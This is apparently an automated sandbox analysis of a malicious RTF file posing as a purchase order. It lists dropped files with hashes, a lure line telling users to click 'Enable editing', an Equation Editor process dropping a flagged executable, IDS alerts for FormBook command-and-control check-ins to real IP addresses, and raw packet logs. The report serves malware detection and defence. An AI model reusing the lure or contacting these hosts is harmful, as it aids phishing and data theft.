                                                                                            SHA-512:54F2FA1CD20188D5482403FE2D8705CA4CCDE0C0507CDAEDEF5861095F4D2C3DEEF0001F25B7F8CA4A0CFF54189A3AB70AAF9227497B6DDBB800735C18C3CF42
                                                                                            Malicious:false
                                                                                            Preview:7.6.4.1.2.1.7.2.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1024
                                                                                            Entropy (8bit):0.05390218305374581
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1536
                                                                                            Entropy (8bit):1.3554734412254816
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbS:IiiiiiiiiifdLloZQc8++lsJe1MzBn
                                                                                            MD5:C04D4D6345AFB202AE886B36484B72B6
                                                                                            SHA1:FD70A245F46FE0E25ABDA3F9F564A78AC744FCFA
                                                                                            SHA-256:ED9114CE8D044E332D0EE7E571E58DDDA4D41CFDD6CA19A0BDBDD00450E124E6
                                                                                            SHA-512:2BB8383B6AB916AC4AE399926421607CB7814FFADB6504FAA101191A7E95C2EC580916DD8287E90C0FAC8FC7ABC45B53C2D76D5B2BEAF43A179032D69BE9A7A0
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                            Category:dropped
                                                                                            Size (bytes):77824
                                                                                            Entropy (8bit):1.133993246026424
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                            MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                            SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                            SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                            SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):5583
                                                                                            Entropy (8bit):4.352170265556474
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:GcuN/gR+7Ogn0XRMcGM3KOGOF++hwIMtvQENw+Y0aR:E/Q+7Ogn0RKOBF++eHvQENw+cR
                                                                                            MD5:4F576602CE4286C96EBFE17A47332626
                                                                                            SHA1:289E71E45B3A4B10CB6E4B9A844EDEECDC09923A
                                                                                            SHA-256:A043CB55CFDBA9F4426C2006502BF2805B19CC9B0C81B09EAA76BDC9BD5F04CC
                                                                                            SHA-512:30B5771042F910EC53EBCB2396BE26DAFB0F2AB1D2FE886C2C1FCE2172D1F45ABB9EB417C24D0B87168690CD0E727F83D3CEC711787A44E095873D9975CF90C2
                                                                                            Malicious:false
                                                                                            Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):926331
                                                                                            Entropy (8bit):6.513562485953698
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:oI0H1fcKoDde/KBkI/njv7UU5vrVGFWG/Pi:obaRdeyBkI/jjUU5vJ8S
                                                                                            MD5:5E5BA61531D74E45B11CADB79E7394A1
                                                                                            SHA1:677224E14AAC9DD35F367D5EB1704B36E69356B8
                                                                                            SHA-256:99E91AE250C955BD403EC1A2321D6B11FCB715BDCC7CB3F63FFB46B349AFDE5C
                                                                                            SHA-512:712BFE419BA97ECF0EC8323A68743013E8C767DA9D986F74AB94D2A395C3086CAC2A5823048E0022D3BBCEBB55281B9E1F8C87FDC9295C70CC5521B57850BF46
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: maildatas.xls, Detection: malicious, Browse
                                                                                            • Filename: 5890796959.xls, Detection: malicious, Browse
                                                                                            • Filename: DlXCfRPdLr.rtf, Detection: malicious, Browse
                                                                                            • Filename: NEW_ORDER.xls, Detection: malicious, Browse
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                            Category:dropped
                                                                                            Size (bytes):486020
                                                                                            Entropy (8bit):7.998960424234155
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:EKlJSZA7zQtl7IZyBgByo77WNMzTSZJVahsC:roZKzQtl7IZyqBy278pJVahsC
                                                                                            MD5:AF10A982A2EF91C9787106EEA1A0CC4A
                                                                                            SHA1:00435A36F5E6059287CDE2CEBB2882669CDBA3A5
                                                                                            SHA-256:E028068B067E5E60FA5680B0BAFA48A31287B6D614EE0B92DF51CCE23B974099
                                                                                            SHA-512:73D0D3034405527798B854DC33FC608C7CCF0AF1689E139AF4BBB5A5324DC0748BDC2BF632468745920DC7BE4EB7F0240D3CF1B5872D3F5C0C897725DB78BF9F
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Thu May 2 05:26:02 2024, length=199141, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):1079
                                                                                            Entropy (8bit):4.527097313880883
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:8Nk/XTsdzxOwCdkU7fBJe79/Qf3Dv3qBk7N:8Nk/XTgzqkeW/BiN
                                                                                            MD5:24D363D0E3C97ACC70836A3D1DF669A3
                                                                                            SHA1:6BB7836F30DBAC252A584546BAE5F41E5A6DD4CF
                                                                                            SHA-256:4B4C559F2A84316F6886235FA768DBBF588A68FC3DA06D3014AABD4D670A3B93
                                                                                            SHA-512:3B0AD846BFCEE891F4A551AF5537C6F136674DB85D6FF12E7144870332038F4A87317F88D8B8FE2770A5BD624389993D14228A6B1E9FFA32A5D1BC2F12434167
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Generic INItialization configuration [folders]
                                                                                            Category:dropped
                                                                                            Size (bytes):80
                                                                                            Entropy (8bit):4.743419658168687
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:M13sRXRmlKRAXdrFom4f0VRXRmlKRAXdrFov:M+xwlAAXd5lVxwlAAXd5y
                                                                                            MD5:DFAC9B954AE3F65DE31A5137C624F38B
                                                                                            SHA1:3F4187329D38535346694DDCDD4F82F85375C2E5
                                                                                            SHA-256:4FCED1AA79A30F92C6152DED4D79BE8EAF14C43084EF16CB750F0805E0939856
                                                                                            SHA-512:D380B10CFFCC9A880C0A593A8BEF4A67D96929D7A53C9066CEEC02DB29F01896AB9941049916BB78CA5E614B20F816C09F3CF056E023C4243A01D3878FD1A8E3
                                                                                            Malicious:false
                                                                                            Preview:[doc]..MOQ010524Purchase order.LNK=0..[folders]..MOQ010524Purchase order.LNK=0..
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):162
                                                                                            Entropy (8bit):2.4797606462020307
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                            MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                            SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                            SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                            SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                            Malicious:false
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):636928
                                                                                            Entropy (8bit):7.634194042962642
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:6ZZcyAHUylUe/tDISmWNf1hAY7PFVSz2NYKcV4v9yf+29EfaGT/T95BGjNBukNFy:CKlUKV7l7PFAz2NNHwu1T/T98BuZ
                                                                                            MD5:3CCB984FD28AFEA83F2F2E8A6ED4CCFA
                                                                                            SHA1:AC0EC507CC8D749FD5FC5E59257856BCD5492E42
                                                                                            SHA-256:57243762AAFFC5CAB1DC4A9E630DB4D4E5D9F746141650CB7E4F78629F7C065D
                                                                                            SHA-512:02BBCDBAD66A138D9C749F4F95FF5BEEBEB2C74D8D244277CAC2795870005866C1D4BF9CCD03B370021F7218D6A0280D8FF8786D3FB0B64A7CFC4D1A3A0E085B
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            File type:Rich Text Format data, version 1
                                                                                            Entropy (8bit):3.502941657337733
                                                                                            TrID:
                                                                                            • Rich Text Format (5005/1) 55.56%
                                                                                            • Rich Text Format (4004/1) 44.44%
                                                                                            File name:MOQ010524Purchase order.doc
                                                                                            File size:199'141 bytes
                                                                                            MD5:7ebb7f9239d5dea3e17fd9b51f12c5a7
                                                                                            SHA1:8b73d2e1bf47b9150706d3fbfad2878447e750bf
                                                                                            SHA256:49eae141b85b2dee809a1e86df1518d2d32a79367cf1a01f55f98c98d32f59ce
                                                                                            SHA512:a3218c3415a313e62c6bcb16cca2620970479a053813a829a33b017897923295fd1ca398225116be065db74c863dde450fa314966dba0150f08a07de749bb03d
                                                                                            SSDEEP:3072:ywAlawAlawAlawAlawAl4iCVKOHLH6CjD4ITLw:ywAYwAYwAYwAYwACiCVnHzJA
                                                                                            TLSH:0614CF6DD34B02698F620337AB171E5141BDBA7EF38552B1306C537933EAC39A1252BE
                                                                                            File Content Preview:{\rtf1..{\*\w19tij52d6pUSSiLdrlXDteAhWm4QJhc2wlsEpzoo8D0vwTMdjgHZ4Rv5XInOz0dByHPJQchtcREUPWmgfcAmwLbtTIKCNUNO2yfWwjLwUmMgHdGoatKLw7sBF3oOqwVi28nMm7PzdXV1xbR4NlxqTZPzksPUo7eAr2wMLaY3yyq}..{\476412172please click Enable editing from the yellow bar above.The
                                                                                            Icon Hash:2764a3aaaeb7bdbf
Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 0000B44Bh | | | | | | | | no
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
05/02/24-08:28:41.519542 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49185 | 80 | 192.168.2.22 | 183.111.183.31
05/02/24-08:29:16.698315 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49193 | 80 | 192.168.2.22 | 154.41.250.58
05/02/24-08:29:58.393847 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49201 | 80 | 192.168.2.22 | 208.91.197.13
05/02/24-08:27:38.140761 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49169 | 80 | 192.168.2.22 | 94.23.162.163
05/02/24-08:29:36.365325 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49197 | 80 | 192.168.2.22 | 183.111.183.31
05/02/24-08:28:05.644786 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49177 | 80 | 192.168.2.22 | 91.195.240.19
05/02/24-08:29:01.993967 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49189 | 80 | 192.168.2.22 | 67.223.117.189
05/02/24-08:27:51.914592 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49173 | 80 | 192.168.2.22 | 194.9.94.86
05/02/24-08:26:56.872559 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49164 | 80 | 192.168.2.22 | 66.96.161.166
05/02/24-08:28:23.793699 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49181 | 80 | 192.168.2.22 | 198.12.241.35
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            May 2, 2024 08:26:08.881376982 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.881381989 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.881552935 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.885504961 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.985701084 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.985774040 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.985852957 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.985929966 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.985935926 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.985977888 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.985981941 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986027956 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986037016 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986073971 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986169100 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986224890 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986227989 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986355066 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986460924 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986530066 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986534119 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986743927 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986747980 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986824989 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986902952 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.986952066 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.986979961 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987020016 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987025976 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987061024 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987067938 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987112999 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987124920 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987169981 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987174034 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987212896 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987627983 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987715960 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987719059 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987730026 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987869978 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:08.987874985 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:08.987937927 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094187975 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094312906 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094346046 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094404936 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094436884 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094444990 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094456911 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094541073 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094763994 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094810009 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094815016 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.094901085 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.094966888 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095030069 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095041037 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095082998 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095093966 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095148087 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095150948 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095201015 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095253944 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095313072 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.095861912 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.095949888 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.096170902 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.096230984 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.096707106 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.096765041 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.096771002 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.096822023 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.097067118 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.097129107 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.097697020 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.097815037 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.097898006 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.097965002 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.098411083 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.098474979 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.098712921 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.098783016 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.099176884 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.099253893 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.202703953 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.202810049 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.202817917 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.202891111 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.203082085 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.203161001 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.203392982 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.203448057 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.203452110 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.203541994 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.203881025 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.203953028 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.204029083 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.204077959 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.204437971 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.204499006 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.204565048 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.204675913 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.205421925 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.205565929 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.205749035 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.205800056 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.205904961 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.205950975 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.206074953 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.206162930 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.206399918 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.206465006 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.206945896 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.207030058 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.207149982 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.207216978 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.207226038 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.207350016 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.207700968 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.207775116 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.207947016 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.208069086 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.208076000 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.208122015 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.208749056 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.208838940 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.208885908 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.208921909 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.209108114 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.209167004 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.209691048 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.209795952 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.210144043 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.210258007 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.210647106 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.210737944 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.210912943 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.210977077 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.211003065 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.211061001 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.211776018 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.211846113 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.211852074 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.211901903 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.211940050 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.212033987 CEST49163443192.168.2.22104.21.74.191
                                                                                            May 2, 2024 08:26:09.212503910 CEST44349163104.21.74.191192.168.2.22
                                                                                            May 2, 2024 08:26:09.212593079 CEST49163443192.168.2.22104.21.74.191
